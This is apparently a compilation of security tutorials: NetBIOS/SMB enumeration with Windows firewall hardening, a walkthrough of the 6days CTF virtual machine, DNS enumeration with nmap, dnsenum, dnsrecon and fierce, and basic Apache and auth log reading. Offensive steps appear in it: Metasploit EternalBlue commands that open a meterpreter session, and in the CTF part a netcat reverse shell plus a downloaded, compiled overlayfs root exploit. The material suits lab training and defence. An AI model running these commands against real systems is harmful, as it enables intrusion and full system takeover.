Beginner's Guide to NetBIOS and SMB Enumeration on Windows

NetBIOS (Network Basic Input/Output System)
NetBIOS is a service that lets applications on different machines (for example a printer or another computer) on an Ethernet or token ring network communicate with each other, addressing one another by NetBIOS name.

A NetBIOS name is a 16-character identifier assigned to a computer in a workgroup; WINS uses it for name resolution between NetBIOS names and IP addresses.

Workgroup VS Domain

Workgroup: a peer-to-peer network of at most 10 computers on the same LAN or subnet. It has no centralized administration, meaning no computer has control over another; each user controls the resources and security locally on their own system.

Domain: a client/server network for up to 2000 computers located anywhere in the world. The administrator manages the domain and its users and resources. A user with a domain account can log on to any computer in the domain without having a local account on that computer.

NetBIOS provides three distinct services:
1. Name service (NetBIOS-NS) for name registration and resolution via port 137.
2. Datagram distribution service (NetBIOS-DGM) for connectionless communication via port 138.
3. Session service (NetBIOS-SSN) for connection-oriented communication via port 139.
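The 16-byte name described above, and the 32-letter form it takes inside the name-service packets on port 137, as an added example (not code from the original article); the host name RAJ-PC is a constructed sample, and the suffix table follows RFC 1001/1002 and the "<xx>" convention of nbtstat output rather than anything on this page.

```python
"""NetBIOS name encoding as carried inside NBNS (UDP/137) packets.

Added illustration for this article, not code from the original post.
A NetBIOS name is exactly 16 bytes: up to 15 characters padded with
spaces, plus a 1-byte service suffix (the "<xx>" nbtstat prints). On the
wire each byte is split into two nibbles, each shifted into 'A'..'P'
(RFC 1001/1002 first-level encoding), giving a 32-letter label.
"""

# Well-known 16th-byte suffixes (the "<xx>" column of nbtstat -a output).
SUFFIXES = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}


def pad_name(name: str, suffix: int) -> bytes:
    """Return the 16-byte NetBIOS name: upper-cased, padded, plus suffix."""
    if not 0 <= suffix <= 0xFF:
        raise ValueError("suffix must fit in one byte")
    raw = name.upper().encode("ascii")
    if len(raw) > 15:
        raise ValueError("NetBIOS names are at most 15 characters")
    # The wildcard "*" used by node-status queries is NUL-padded;
    # every other name is padded with spaces (0x20).
    pad = b"\x00" if raw == b"*" else b" "
    return raw.ljust(15, pad) + bytes([suffix])


def encode_name(name: str, suffix: int = 0x00) -> str:
    """First-level encode: each nibble of each byte becomes one letter A..P."""
    letters = []
    for b in pad_name(name, suffix):
        letters.append(chr((b >> 4) + ord("A")))
        letters.append(chr((b & 0x0F) + ord("A")))
    return "".join(letters)


def decode_name(encoded: str) -> tuple:
    """Inverse of encode_name: 32 letters -> (trimmed name, suffix byte)."""
    if len(encoded) != 32 or any(c not in "ABCDEFGHIJKLMNOP" for c in encoded):
        raise ValueError("expected 32 characters in the range A..P")
    raw = bytes(
        ((ord(encoded[i]) - ord("A")) << 4) | (ord(encoded[i + 1]) - ord("A"))
        for i in range(0, 32, 2)
    )
    name = raw[:15].rstrip(b" \x00").decode("ascii")
    return name, raw[15]


def describe(encoded: str) -> str:
    """Render one name-table row the way nbtstat shows it."""
    name, suffix = decode_name(encoded)
    return f"{name:<15} <{suffix:02X}> {SUFFIXES.get(suffix, 'unknown suffix')}"


if __name__ == "__main__":
    # Constructed sample: the registrations a host named RAJ-PC would hold for
    # its workstation and file-server services, plus the wildcard name that a
    # node-status query (what nbtstat -a sends) asks for.
    for enc in (encode_name("RAJ-PC", 0x00), encode_name("RAJ-PC", 0x20), encode_name("*")):
        print(enc, "->", describe(enc))
```

The wildcard name encodes to the well-known "CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" label, which is what a port 137 filter like the one built later in this article stops from being answered.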


Port   Protocol   Service
135    TCP        MS-RPC endpoint mapper
137    UDP        NetBIOS Name Service
138    UDP        NetBIOS Datagram Service
139    TCP        NetBIOS Session Service
445    TCP        SMB Protocol

Port 135: used for Microsoft Remote Procedure Call (MS-RPC) between client and server; the endpoint mapper listens here for client queries. In short, it carries RPC messaging between clients and between client and server.

Port 137: the name service operates on UDP port 137. The name service primitives offered by NetBIOS are:
· Add name - registers a NetBIOS name.
· Add group name - registers a NetBIOS "group" name.
· Delete name - un-registers a NetBIOS name or group name.
· Find name - looks up a NetBIOS name on the network.


Port 138: Datagram mode is connectionless; the application is responsible for error detection and recovery. In NBT, the datagram service runs on UDP port 138. The datagram service primitives offered by NetBIOS are:
· Send Datagram - send a datagram to a remote NetBIOS name.
· Send Broadcast Datagram - send a datagram to all NetBIOS names on the network.
· Receive Datagram - wait for a packet to arrive from a Send Datagram operation.
· Receive Broadcast Datagram - wait for a packet to arrive from a Send Broadcast Datagram operation.

Port 139: Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. In NBT, the session service runs on TCP port 139.
The session service primitives offered by NetBIOS are:
· Call - opens a session to a remote NetBIOS name.
· Listen - listen for attempts to open a session to a NetBIOS name.
· Hang Up - close a session.
· Send - sends a packet to the computer on the other end of a session.
· Send No Ack - like Send, but doesn't require an acknowledgment.
· Receive - wait for a packet to arrive from a Send on the other end of a session.


Port 445: used by the SMB (Server Message Block) protocol for file sharing between systems of the same or different operating systems, i.e. Windows-Windows, Unix-Unix and Unix-Windows.
For more details, read our previous article linked below:




Scanning open ports for NetBIOS enumeration

We use nmap to scan the target for open TCP and UDP ports and the protocols behind them.
nmap -sT -sU 192.168.1.128

In the given image you can see from the scan result that port 137 is open for the NetBIOS name service; the scan also returned the MAC address of the target system.


What happens when an admin shares a folder on the network?

Suppose we grant share permission on a specific folder (for example "ignite", as shown in the image) so that it can be shared with other users on the local network. Which ports are involved in this process?


Now you can observe that we have a link for our shared folder. Using that link anyone on the network can access the folder, which means a new port must have been opened to establish connections to the share on the other system. Let's find out which.


Now we scan the target again with nmap.
nmap -sT -sU 192.168.1.128

From the scan result you can observe that after sharing a folder, ports 135, 139 and 445 have become active.
Hence, simply by sharing a single folder on the network, three ports are opened simultaneously on the target system for communication with other systems.


Under Computer > Properties, a user can view basic information about their computer.
As you can see, the image shows the victim's Control Panel home, which displays basic system information such as the computer name and workgroup.


The same information can be enumerated from another system on the network with the following command:
nbtstat -a 192.168.1.128

Reading the NetBIOS remote machine name table, we have enumerated the same information as shown in the image above.


Apply a filter on ports 135-139 with the firewall

To increase the security of your system on the local network you can add a filter on port 137 with the help of Windows Firewall. Since the port range 135 to 139 is the most commonly abused, the administrator can block either the whole range or a specific port.

Select Inbound Rules and click on New Rule.


Select the Port radio button, which creates a rule that controls connections for a TCP or UDP port.
Then click Next.


Select UDP to apply the rule to UDP ports.
Enter 137 as the specific local port, then click Next. You can also enter the complete range here, for example: 135,137,138,139.


Choose Block the connection as the action to take when a connection matches the specified conditions.
This will not allow traffic on port 137, so if an attacker scans the victim system he will not be able to find the NetBIOS name of the target.

Click on next.


Finally, give your new rule a name of your choice (in the image, "block nbtsat") and click Finish; you will see the new rule added to Windows Firewall.


Now scan the target system again using the previous command:
nbtstat -a 192.168.1.128

This time it gives no NetBIOS information. In the given image you can read the message "Host is not found."


Now let's try to access the shared folder of the target (192.168.1.128) while port 137 is blocked, and find out whether we can access the shared folder "ignite" or not, using the Run prompt.

In the given image you can see that we are able to access the ignite folder even after port 137 has been blocked by the admin on his network.

Conclusion: although port 137 was blocked, sharing was still possible because the protocols on ports 139 and 445 were still running. By blocking 137 the admin has added a security layer that hides the NetBIOS name of his system (192.168.1.128) on the local network.


Block port 139

Similarly, use a firewall inbound rule again to block port 139, so that we can verify its impact on sharing between two or more systems. This adds a new rule to the firewall that stops traffic coming in on port 139.


Now let's again try to access the shared folder of the target (192.168.1.128) while ports 137 and 139 are both blocked, and find out whether we can access the shared folder "ignite" or not, using the Run prompt.

In the given image you can see that we are still able to access the ignite folder after port 139 has been blocked by the admin on his network.

Conclusion: although ports 137 and 139 were both blocked, sharing was still possible because the protocol on port 445 was still running. By blocking 139 the admin has added a security layer that prevents the NetBIOS session service and with it NetBIOS enumeration.


In many organizations the port range 135 to 139 is blocked on the network for security reasons, so port 445 is what carries file sharing. Now identify whether it is vulnerable to MS17-010 using Metasploit, as shown in the image.
use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.128
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

The result shows the host is vulnerable to MS17-010, hence the target can be exploited easily.

For more scanning methods, read our previous article here.


use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.128
msf exploit(ms17_010_eternalblue) > set rport 445
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.115
msf exploit(ms17_010_eternalblue) > exploit

This exploits the target system and gives a meterpreter session on the targeted system, as shown in the image.

Conclusion: enumeration plays an important role in network penetration testing because it brings out hidden information about the victim's system as well as identifying weaknesses that may help in exploiting it.


Hack the 6days VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as 6days. The credit for making this VM goes to "CanYouPwn.Me", and it is another boot2root challenge where we have to execute the flag file to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here it is 192.168.0.18, but you will have to find your own):

netdiscover


Use nmap for port enumeration:
nmap -sV 192.168.0.18


We find that a web port is open, so we open this IP in our browser.




We find that this page may be vulnerable to LFI and RFI, so we use curl to carry out our attack.


We find that LFI works on this site. Now we take a look at the config file to find the name of the database.


Looking at the config file, we find that the database is accessible through localhost. So we use SQL injection via LFI to access the database. Port 80 is behind a WAF, so we use 8080 to reach localhost.


We find a username and password. We know that SSH is open, so we try this username and password to log in through SSH.
ssh andrea@192.168.0.18


Now we are connected through SSH, but when we try to run commands it seems that nothing works. It is possible that output is redirected to /dev/null, so we use netcat to get a reverse shell.

We set up a listener on our system first.

nc -lvp 1234


Now we try to connect back using a netcat reverse shell:

nc -e /bin/sh 192.168.0.18 1234


Once we get the shell we can see the output of the commands. We also find that the OS is Ubuntu 12.04, which is vulnerable to the overlayfs exploit.



So we move to the /tmp/ folder, download the overlayfs exploit and save it as exploit.c:
cd /tmp/
wget https://www.exploit-db.com/download/37292 --no-check-certificate
mv 37292 exploit.c


We compile the file into a binary called exploit, give it executable permission and run it.
gcc -o exploit exploit.c
chmod 777 exploit
./exploit


Now we have root access. Going back to the home directory, we find an executable file called flag.


When we run the executable it shows us a congratulations message stating that we have completed the challenge.


4 Ways to DNS Enumeration

Today we are going to perform DNS enumeration using the Kali Linux platform only, which has built-in tools for DNS enumeration. For this tutorial you must be familiar with DNS servers and their records; if you are not, read our previous article "Setup DNS Penetration Testing Lab on Windows Server 2012".

Nmap
The following command tries to discover hosts' services using the DNS Service Discovery protocol. It sends a multicast DNS-SD query and collects all the responses.

The script first sends a query for _services._dns-sd._udp.local to get a list of services. It then sends a follow-up query for each one to try to get more information.

nmap --script=broadcast-dns-service-discovery


From the screenshot you can observe the services running on the DNS server.


The following command tries to enumerate DNS hostnames by brute-force guessing of common subdomains. With the dns-brute.srv argument, dns-brute will also try to enumerate common DNS SRV records.

Wildcard records are listed as "*A" and "*AAAA" for IPv4 and IPv6 respectively.
nmap -T4 -p 53 --script dns-brute www.hackingarticles.in

From the screenshot you can observe the DNS hostnames.


By default, a DNS server performs recursive queries on behalf of its DNS clients and of DNS servers that have forwarded DNS client queries to it.
Attackers can use recursion to deny the DNS Server service. Therefore, if a DNS server in your network is not intended to receive recursive queries, recursion should be disabled on that server.
The following command checks whether a DNS server allows queries for third-party names. It is expected that recursion will be enabled on your own internal nameservers.
From https://technet.microsoft.com

nmap -Pn -sU -p 53 --script=dns-recursion 192.168.1.150

As a result you can observe that recursion is enabled on the targeted system.


The following command enumerates various common service (SRV) records for a given domain name. The service records contain the hostname, port and priority of servers for a given service. The following services are enumerated by the script:
· Active Directory Global Catalog
· Exchange Autodiscovery
· Kerberos KDC Service
· Kerberos Passwd Change Service
· LDAP Servers
· SIP Servers
· XMPP S2S
· XMPP C2S

nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='google.com'"


DNSEnum

DNSEnum is a multithreaded Perl script to enumerate DNS information of a domain and to discover non-contiguous IP blocks.
OPERATIONS:
· Get the host's addresses (A record).
· Get the nameservers (threaded).
· Get the MX records (threaded).
· Perform AXFR queries on nameservers and get BIND VERSION (threaded).
· Get extra names and subdomains via Google scraping (Google query = "allinurl: -www site:domain").
· Brute force subdomains from a file; can also perform recursion on subdomains that have NS records (all threaded).
· Calculate class C network ranges and perform whois queries on them (threaded).
· Perform reverse lookups on netranges (class C and/or whois netranges) (threaded).
· Write IP blocks to the domain_ips.txt file.

The following command skips reverse-lookup enumeration and saves the output in XML format.
dnsenum --noreverse -o mydomain.xml hackingarticles.in


DNSRecon
DNSRecon provides the ability to:
1. Check all NS records for zone transfers
2. Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
3. Perform common SRV record enumeration
4. Top Level Domain (TLD) expansion
5. Check for wildcard resolution
6. Brute force subdomain and host A and AAAA records given a domain and a wordlist
7. Perform a PTR record lookup for a given IP range or CIDR
8. Check a DNS server's cached records for A, AAAA and CNAME records, given a list of host records in a text file
9. Enumerate common mDNS records in the local network
10. Enumerate hosts and subdomains using Google

The following command enumerates the DNS records of the targeted website:
dnsrecon -d hackingarticles.in
You can observe the result in the image below.


Fierce
Fierce is a reconnaissance tool. It is a Perl script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.

Type the following command for DNS enumeration on the targeted website:
fierce -dns hackingarticles.in
From the screenshot you can see that we obtained almost the same results as from the tools above.

Understanding Log Analysis of Web Server

Logs
Log files are a standard tool for computer system developers and administrators. They record the "W5" of a system: what happened, when, by whom, where and why. This information can record faults and help diagnose them.

Log Format
The Common Log Format is also known as the NCSA Common Log Format. Each line in a file stored in the Common Log Format has the following syntax:
host ident authuser date request status bytes

Example

127.0.0.1 user-identifier raj [30/Aug/2017:10:25:16 -0700] "GET /apache_pb.gif HTTP/1.0" 200 1068

1. A "-" in a field indicates missing data.
2. 127.0.0.1 is the IP address of the client (remote host) that made the request to the server.
3. user-identifier is the RFC 1413 identity of the client.
4. raj is the user id of the person requesting the document.
5. [30/Aug/2017:10:25:16 -0700] is the date, time and time zone at which the request was received.
6. "GET /apache_pb.gif HTTP/1.0" is the request line from the client.
7. 200 is the HTTP status code returned to the client. 2xx is a successful response, 3xx a redirection, 4xx a client error and 5xx a server error.
8. 2326 is the size of the object returned to the client, measured in bytes.

Importance of log analysis
Logs play an important role in tracking each client computer's activity and its communication with other computers and networks. Network or system administrators analyse logs to keep an eye on the network for weaknesses that attackers may use to gain access to sensitive information. You may be able to identify who introduces risks and help that person take better precautions.

Location of log files

Generally, on Linux or UNIX systems logs are created under the /var/log directory, where you will find important log files such as those for apache, auth, mysql, kernel, bootstrap, dmesg, apt, etc.


Some Important Types of Logs
Application log
The application log contains events logged by applications or programs. For example, a database program might record a file error in the application log.
Apache: /var/log/apache
Samba: /var/log/samba
Mail: /var/log/
MySQL: /var/log/

For example, let's consider the Apache log files. There are two types of Apache HTTP server log files:

· Apache Access Log File
The Apache server records all incoming requests and all requests processed to a log file. The access log is located at /var/log/apache/access.log.

· Apache Error Log File
All Apache errors found while processing server requests are logged to this file. The error log is located at /var/log/apache/error.log.



Now open the apache2 log directory using the following commands in a terminal (UNIX system).
cd /var/log/apache2
ls
You can see all the apache2 log files as shown in the image.
echo > access.log
Using the echo command I have emptied access.log of all previous logs, so that we can read only the recent logs for the current activity.


As described above, apache2 creates logs for client activity in the browser. I therefore opened some web applications, dvwa, bwapp and a wordpress site, in that order, and as a result their logs were created in apache2's access log in the same order.


There are many commands and tools for log analysis; among them we use only three command-line utilities, cat, head and tail, for reading logs.

In the given image you can see that we used the cat command to read the log, which begins with dvwa's entries and ends with wordpress's.

cat is the standard UNIX utility for reading the contents of a file. With cat you can view the whole content of any log file.
Syntax: cat [options] filename
cat access.log


head is a program on UNIX and Unix-like systems used to display the beginning of a text file.
Syntax: head [options] filename
head access.log
By default, head prints the first 10 lines of its input to standard output. Use the -n option for a specific number of lines, for example: head -n 30 filename.


tail is a program on UNIX and Unix-like systems used to display the end of a text file.
Syntax: tail [options] filename
tail access.log
In the given image you can see that it shows the wordpress logs at the end of the file.


A targeted way of reading logs

Since tail reads the last lines of a log file, which hold the client's most recent activity, we will use tail's options to read logs in a targeted way.
By default, tail outputs the last 10 lines of its input to standard output. Use the -n option for a specific number of lines, for example: tail -n 30 filename.

tail -n 2 access.log

In the given image you can see that the above command filtered the output and read only the two most recent records.


If you want to read multiple log files simultaneously, type the following command.

tail -n 2 access.log error.log

In the given image you can observe that it shows two lines for each file, i.e. the access log and the error log.


Now apply a filter using the grep command together with tail to pick specific records out of the log.
Syntax: tail [option] filename | grep "string" [option]

tail access.log | grep 200

In the given image you can notice that it has highlighted the log entries containing the string 200. For a network administrator this command reduces the effort of log analysis, because he/she can directly read those entries where a client or attacker got a successful response from the server.


When the server is unable to satisfy a client's request, it responds with error 404 "Not Found".


tail access.log | grep 404

In the given image you can see that it has highlighted the entries containing 404 from the set of log records.


As you know, we browsed the web applications dvwa, bwapp and wordpress in that sequence in the browser, so their logs appear in the same sequence: dvwa's at the top, bwapp's in the middle and wordpress's at the end of access.log.
Log files are very large and reading them all at once is not practical for an administrator, so he/she can use grep's after and before options as filters.
Syntax: tail [option] filename | grep -A [number of lines] "string"

tail access.log | grep -A 2 "bwapp"

Here -A stands for after, so it prints the 2 log entries created after each bwapp entry, which here means 2 wordpress entries, as shown in the image.


Similarly, apply a filter with the before parameter by typing the following command with a specific argument.

tail access.log | grep -B 2 "wordpress"

Here -B stands for before, so it prints the 2 log entries created before each wordpress entry, which here means 2 bwapp entries, as shown in the image.
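The Common Log Format fields listed earlier and the grep -A/-B style filtering just shown, as an added Python example that is not part of the original article; the access.log lines are constructed in the article's dvwa, bwapp, wordpress order, and the function names are my own.

```python
"""Parse Common Log Format lines and filter them the way the article does
with grep: by status code and with -A/-B style context.

Added illustration for this article, not code from the original post. The
log lines below are constructed in the article's browsing order (dvwa, then
bwapp, then wordpress); they are not a real capture.
"""
import re
from datetime import datetime

SAMPLE_ACCESS_LOG = """\
192.168.0.104 - - [30/Aug/2017:10:25:16 -0700] "GET /dvwa/login.php HTTP/1.1" 200 1289
192.168.0.104 - - [30/Aug/2017:10:25:17 -0700] "GET /dvwa/css/login.css HTTP/1.1" 200 611
192.168.0.104 - - [30/Aug/2017:10:26:02 -0700] "GET /bwapp/login.php HTTP/1.1" 200 5327
192.168.0.104 - - [30/Aug/2017:10:26:03 -0700] "GET /bwapp/images/missing.png HTTP/1.1" 404 289
192.168.0.104 - - [30/Aug/2017:10:27:40 -0700] "GET /wordpress/ HTTP/1.1" 200 24011
192.168.0.104 - raj [30/Aug/2017:10:27:41 -0700] "GET /wordpress/wp-admin/ HTTP/1.1" 302 -
this line is not in Common Log Format and must be rejected
"""

# host ident authuser [date] "request" status bytes  (a "-" means no data)
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<authuser>\S+) \[(?P<date>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_clf(text: str):
    """Return (entries, rejected_lines); malformed lines are kept for review."""
    entries, rejected = [], []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            rejected.append(line)
            continue
        e = m.groupdict()
        e["date"] = datetime.strptime(e["date"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        e["size"] = 0 if e["size"] == "-" else int(e["size"])  # "-": no body sent
        entries.append(e)
    return entries, rejected


def with_status(entries, status: int):
    """Like `grep 200` / `grep 404`, but matched on the status field only, so a
    200 inside a URL or a byte count cannot produce a false hit."""
    return [e for e in entries if e["status"] == status]


def count_by_class(entries):
    """Summarise responses as 2xx / 3xx / 4xx / 5xx counts."""
    counts = {}
    for e in entries:
        key = f"{e['status'] // 100}xx"
        counts[key] = counts.get(key, 0) + 1
    return counts


def grep_context(entries, needle: str, before: int = 0, after: int = 0):
    """Emulate `grep -B before -A after needle` over the request field: keep
    every matching entry plus its neighbours, in file order, without repeats."""
    keep = set()
    for i, e in enumerate(entries):
        if needle in e["request"]:
            keep.update(range(max(0, i - before), min(len(entries), i + after + 1)))
    return [entries[i] for i in sorted(keep)]


if __name__ == "__main__":
    entries, rejected = parse_clf(SAMPLE_ACCESS_LOG)
    print(f"{len(entries)} entries parsed, {len(rejected)} rejected")
    print("status classes:", count_by_class(entries))
    for e in grep_context(entries, "bwapp", after=2):  # like grep -A 2 "bwapp"
        print(e["date"].isoformat(), e["status"], e["request"])
```

Matching on the parsed status field rather than on the raw line is what separates this from `grep 200`, which would also hit a byte count of 200 or a URL containing that number.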



The auth.log file holds system authorization information, including user login attempts (both successful and failed) as well as the authentication method used to establish the connection with the server, for example SSH logins between server and client.
Location: /var/log

Again I used the echo command to remove all previous records from auth.log:
echo > auth.log


Suppose a client uses PuTTY for SSH login to the server.


If the client has valid credentials for SSH, he will log in to the server successfully. In the given image you can see that I logged in successfully. Hence, inside the server's auth.log a new record is created for the successful SSH login.


In the next image you can read an access denied message, which means the login to the SSH server failed. This time a new record for the SSH login failure is created in auth.log.


Now let's read all the records of auth.log for the above client activities using the cat command.
cat auth.log
In the given image you can read the logs for the successful and the failed login.
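Reading auth.log for the successful and failed SSH logins just described, as an added Python example that is not from the original article; the log lines are constructed in the syslog format sshd writes on Debian/Ubuntu, and the failure threshold is an assumption.

```python
"""Pick SSH login outcomes out of auth.log and flag the two patterns an
administrator reading it by hand looks for: many failures from one source,
and a success from a source that had just been failing.

Added illustration for this article, not code from the original post. The
log lines are constructed in the syslog format sshd writes to auth.log on
Debian/Ubuntu; they are not a real capture.
"""
import re
from collections import Counter

SAMPLE_AUTH_LOG = """\
Aug 30 10:33:45 ubuntu sshd[2260]: Failed password for raj from 192.168.0.104 port 50230 ssh2
Aug 30 10:33:49 ubuntu sshd[2260]: Failed password for raj from 192.168.0.104 port 50230 ssh2
Aug 30 10:33:53 ubuntu sshd[2261]: Failed password for invalid user admin from 192.168.0.110 port 41002 ssh2
Aug 30 10:34:10 ubuntu sshd[2270]: Accepted password for raj from 192.168.0.104 port 50244 ssh2
Aug 30 10:34:10 ubuntu sshd[2270]: pam_unix(sshd:session): session opened for user raj by (uid=0)
Aug 30 10:35:02 ubuntu sshd[2281]: Accepted publickey for deploy from 192.168.0.120 port 39000 ssh2
"""

SSHD_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: '
    r'(?P<outcome>Accepted|Failed) (?P<method>\w+) for (?:(?P<invalid>invalid user) )?'
    r'(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)'
)


def parse_sshd_events(text: str):
    """Return one dict per Accepted/Failed line; other sshd/pam lines are skipped."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            e = m.groupdict()
            e["invalid"] = e["invalid"] is not None  # the account does not exist
            e["port"] = int(e["port"])
            events.append(e)
    return events


def failures_by_source(events):
    """Count failed logins per source IP (Counter of ip -> failures)."""
    return Counter(e["ip"] for e in events if e["outcome"] == "Failed")


def suspicious_sources(events, threshold: int = 2):
    """Sources with at least `threshold` failures, worst first (threshold is assumed)."""
    return [ip for ip, n in failures_by_source(events).most_common() if n >= threshold]


def success_after_failures(events):
    """(ip, user, failures_before) for each Accepted login preceded by failures
    from the same source: the signature of a guessed password."""
    seen = Counter()
    hits = []
    for e in events:
        if e["outcome"] == "Failed":
            seen[e["ip"]] += 1
        elif seen[e["ip"]]:
            hits.append((e["ip"], e["user"], seen[e["ip"]]))
            seen[e["ip"]] = 0  # report once per run of failures
    return hits


if __name__ == "__main__":
    ev = parse_sshd_events(SAMPLE_AUTH_LOG)
    print("failures per source:", dict(failures_by_source(ev)))
    print("sources at/over threshold:", suspicious_sources(ev))
    print("success after failures:", success_after_failures(ev))
```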


vsftpd Log

The vsftpd log holds the authentication log for FTP logins, both successful and failed.
Location: /var/log
I emptied all previous logs with the echo command and used WinSCP to log in to the FTP server. You can observe that we logged in successfully; hence a new record for the successful client login is created in vsftpd.log.


Now let's verify it through the vsftpd log file, using cat to read the whole file. In the given image you can observe that it has created a record in the log file showing that client 192.168.0.104 is CONNECTed.

cat vsftpd.log


System Log

syslog is a standard for system logs or message logging. Administrators may use syslog for system management and security auditing as well as for general informational, analysis and debugging messages. A wide variety of devices, such as printers, routers and message receivers across many platforms, use the syslog standard.
Location: /var/log
Use the cat command to read the syslog, as shown in the image.
cat syslog


APT Log
apt is a standard command-line package tool on Ubuntu and similar Linux systems, used for installing new software packages, upgrading existing packages, updating the package list index, and even upgrading the entire Ubuntu system.

Location: /var/log
apt keeps its own log files for all new and previously installed software. It has two log files:

· history.log: /var/log/apt/history.log
· term.log: /var/log/apt/term.log

Now type the following command to read apt's history log.

cat history.log


In the given image you can observe the result, which contains information about software installations and updates.

That was a brief introduction to reading logs in the simplest way.
Source: Wikipedia.org